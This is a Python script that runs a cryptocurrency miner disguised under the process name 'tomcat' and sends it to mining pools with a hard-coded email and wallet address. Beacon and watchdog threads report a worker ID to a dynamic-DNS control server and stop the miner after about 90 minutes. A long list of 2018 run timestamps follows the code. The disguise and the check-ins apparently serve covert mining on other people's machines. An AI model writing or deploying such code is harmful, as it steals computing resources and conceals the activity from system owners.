import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:34:03.823426
#2018-02-17 17:22:03.569974
#2018-02-17 19:11:03.469003
#2018-02-17 21:01:01.415082
#2018-02-17 22:45:08.390996
#2018-02-18 00:29:06.722669
#2018-02-18 02:20:09.251184
#2018-02-18 04:08:03.423302
#2018-02-18 05:59:06.407075
#2018-02-18 07:49:02.209668
#2018-02-18 09:37:05.001524
#2018-02-18 11:23:01.659983
#2018-02-18 13:09:06.689119
#2018-02-18 14:57:05.930563
#2018-02-18 16:46:03.344626
#2018-02-18 18:34:04.450141
#2018-02-18 20:22:08.073866
#2018-02-18 22:08:06.415406
#2018-02-18 23:56:05.257572
#2018-02-19 01:42:03.781791
#2018-02-19 03:30:03.133210
#2018-02-19 05:14:04.925928
#2018-02-19 06:59:02.182135
#2018-02-19 08:48:04.321342
#2018-02-19 10:38:05.572047
#2018-02-19 12:25:09.298277
#2018-02-19 14:12:01.418852
#2018-02-19 16:01:06.649040
#2018-02-19 17:50:03.100187
#2018-02-19 19:36:05.150842
#2018-02-19 21:25:04.234105
#2018-02-19 23:10:08.097686
#2018-02-20 00:55:06.881149
#2018-02-20 02:43:05.338814
#2018-02-20 04:31:06.836226
#2018-02-20 06:15:02.333067
#2018-02-20 08:00:01.734952
#2018-02-20 09:45:09.132558
#2018-02-20 11:29:04.297325
#2018-02-20 13:15:08.914970
#2018-02-20 14:59:08.299280
#2018-02-20 16:45:09.335954
#2018-02-20 18:35:05.819470
#2018-02-20 20:25:07.463027
#2018-02-20 22:10:08.789765
#2018-02-20 23:51:03.699022
#2018-02-21 01:36:03.956904
#2018-02-21 03:23:06.467869
#2018-02-21 05:10:04.340857
#2018-02-21 06:57:07.298098
#2018-02-21 08:44:15.110900
#2018-02-21 10:32:03.736148
#2018-02-21 12:19:07.604467
#2018-02-21 14:06:08.619838
#2018-02-21 15:52:01.380986
#2018-02-21 17:46:01.421491
#2018-02-21 19:33:04.019620
#2018-02-21 21:20:05.666384
#2018-02-21 23:06:05.664292
#2018-02-22 00:53:06.330805
#2018-02-22 02:41:08.423025
#2018-02-22 04:27:03.704696
#2018-02-22 06:13:02.088238
#2018-02-22 07:57:05.563883
#2018-02-22 09:47:06.050101
#2018-02-22 11:32:01.782339
#2018-02-22 13:19:04.683168
#2018-02-22 15:08:01.424198
#2018-02-22 16:51:09.710914
#2018-02-22 18:39:05.072851
#2018-02-22 20:32:02.174495
#2018-02-22 22:17:05.903347
#2018-02-23 00:03:04.201012
#2018-02-23 01:50:01.456579
#2018-02-23 03:38:01.295521
#2018-02-23 05:23:05.373958
#2018-02-23 07:08:07.155140
#2018-02-23 08:59:07.217647
#2018-02-23 11:04:05.203495
#2018-02-23 12:59:04.200478
#2018-02-23 14:46:06.946671
#2018-02-23 16:34:05.164321
#2018-02-23 18:20:07.946225
#2018-02-23 20:06:01.699885
#2018-02-23 21:51:05.778659
#2018-02-23 23:37:03.472045
#2018-02-24 01:25:06.626020
#2018-02-24 03:16:07.903839
#2018-02-24 05:00:07.990446
#2018-02-24 06:50:04.042492
#2018-02-24 08:34:05.242594
#2018-02-24 10:20:01.520109
#2018-02-24 12:15:06.823554
#2018-02-24 14:04:06.246183
#2018-02-24 15:52:06.839589
#2018-02-24 17:45:06.151675
#2018-02-24 19:31:03.939279
#2018-02-24 21:19:06.975705
#2018-02-25 01:14:07.664083
#2018-02-25 05:07:07.069112
#2018-02-25 10:20:01.976135